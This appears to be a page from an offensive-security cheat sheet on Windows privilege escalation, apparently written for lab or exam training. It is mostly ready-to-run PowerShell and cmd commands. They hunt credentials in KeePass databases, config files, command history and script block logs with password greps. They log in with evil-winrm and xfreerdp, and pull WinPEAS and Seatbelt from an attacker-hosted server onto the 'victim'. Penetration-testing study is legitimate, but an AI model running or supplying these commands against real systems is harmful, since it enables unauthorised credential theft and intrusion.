Privilege Escalation [Searching]

Checking Environment Variable

# To list all variable 

Get-ChildItem Env:

cmd /c "set"

Searching for Hidden Plain text

PowerShell

# Searching for KeePass Database.
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

# Searching for Text file and configuration file in Xampp
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

# Searching credential files in Home Directory of the user.
Get-ChildItem -Path C:\Users\<USERNAME> -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.exe, *.log, *.bak -File -Recurse -ErrorAction SilentlyContinue

# To search for running binary
tasklist /v


# You want to get Full name with above command
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.exe, *.log, *.bak -File -Recurse -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName

# If Above command output looks overwhelming then run command for each extention one by one.

To better analysis of .log file. Transfer it to kali Linux and analyze it for sensitive data.

Cmd

# Command to save search using cmd in file.
for %a in (txt pdf xls xlsx doc docx ini log bak) do forfiles /p "C:\Users" /s /m *.%a /c "cmd /c echo @path 2>nul" >> "%CD%\file_search_output.txt"


# This modified command will:
# 1. Search for the specified file types,
# 2. Look for the strings "password", "username", and "passwd",
# 3. Write the file paths and matched values to the output files,
# 4. Suppress any "Access Denied" errors.

# Not Much Useful command.
for %a in (txt pdf xls xlsx doc docx ini log bak) do forfiles /p "C:\Users" /s /m *.%a /c "cmd /c findstr /i /m \"password username passwd\" @path 2>nul && (echo @path >> \"%CD%\file_search_output.txt\" & findstr /i \"password username passwd\" @path >> \"%CD%\file_value_search_output.txt\") 2>nul"

Try to Compromise the user who is member of Remote Desktop Users So, that you can get GUI access for easy enumeration.

Accessing User account

# If you are in GUI mode and have credential for user.
runas /user:<USERNAME> cmd  # Enter password of the user.

# If you have credential and user is part of Remote Desktop users:
# This Command Give perfect Windows size for PC kali linux in full screen mode

xfreerdp /v:$ip /u:alex /p:WelcomeToWinter0121 /size:4080x1900

More Details on Xfreerdp and Run as Tool

Accessing User (RDP and other method) | Tools | Tips To Securehacking.tipstosecure.com

You can use Cyberchef for decoding purpose.

CyberChefgchq.github.io

Finding Hidden information

Powershell

# Finding History of command used if not cleared.
Get-History

# History of command using PSReadline if not cleared.
(Get-PSReadlineOption).HistorySavePath # Read history file using "type" Command.
Get-Content "$((Get-PSReadlineOption).HistorySavePath)" # Display content directly

Evil-winrm tool provides various built-in functions for penetration testing such as pass the hash, in-memory loading, and file upload/download.

If evil winrm is confirged then connect using below command:

evil-winrm -i $IP -u $UserName -p $PassWord

Script Block Logging can also be used for finding crucial information.

Searching in Script Block Logging

Shortcut:

As there is a lots of content in the Script block Logging, It's Difficult to check All logs one by one.

# Create a csv of Script block logging content:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object {$_.Id -eq 4104} | Export-Csv -Path "script_block_logs.csv"

# Look for sensitive information
Get-Content "script_block_logs.csv" | Select-String -Pattern "password|username|api_key|secret|GetBytes|ToBase64String|Credential"

Manual approach:

location of script block logging

I fount the operational file at the location:

Event Viewer > application and service logs > Microsoft > windows > Powershell > Operational

create Filter in this:

Now look for sensitive data in logs one by one 🤣.

Looking Inside Hidden Directory

Sometimes Hidden directories may contain sensitive information. For example, AppData Present in the Administrator Directory. So, We should check that also.

# Below is Extention of file which can have sensitive information.
# Search for this type of file and then filter it out using select-string.
# Use one by one to avoid lots of data
*.ini, *.json, *.xml, *.yaml, *.env, *.cfg, *.dat, *.bak, *.reg, *.properties, *.logs, *.settings, *.conf, *.config

You can check for critical information in above files using below command:

# One Liner (Modify as per need)
Get-ChildItem -Path C:\Users\Administrator -Include *.settings -File -Force -Recurse -ErrorAction SilentlyContinue | ForEach-Object { $matches = Select-String -Path $_.FullName -Pattern "Password" -Context 2,2; if ($matches) { Write-Output "File: $($_.FullName)"; $matches; Write-Output ("-" * 50) } }

Using Automated tool

# start a webserver in this location of kali if you have winpeas installed.
locate winpeas
python3 -m http.server 8000 -d  /usr/share/peass/winpeas/

# Uploading WinPeas to Victim using powershell
iwr -uri http://$kaliIp:8000/winPEASx64.exe -Outfile winPEAS.exe # make sure http server is running

# Running script

./winPEAS.exe

We can also use Seatbelt for the same.

# fatching Seatbelt
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Seatbelt.exe

# Send it to windows
iwr -uri http://192.168.45.194/Seatbelt.exe -Outfile Seatbelt.exe

# Run it for all 
./Seatbelt.exe -group=all

Previousrecon 2.0 NextLeveraging Windows Services

Last updated 1 year ago

hashtagChecking Environment Variable

hashtagSearching for Hidden Plain text

hashtagAccessing User account

hashtagFinding Hidden information

hashtagSearching in Script Block Logging

hashtagShortcut:

hashtagManual approach:

hashtagLooking Inside Hidden Directory

hashtagUsing Automated tool

Checking Environment Variable

Searching for Hidden Plain text

Accessing User account

Finding Hidden information

Searching in Script Block Logging

Shortcut:

Manual approach:

Looking Inside Hidden Directory

Using Automated tool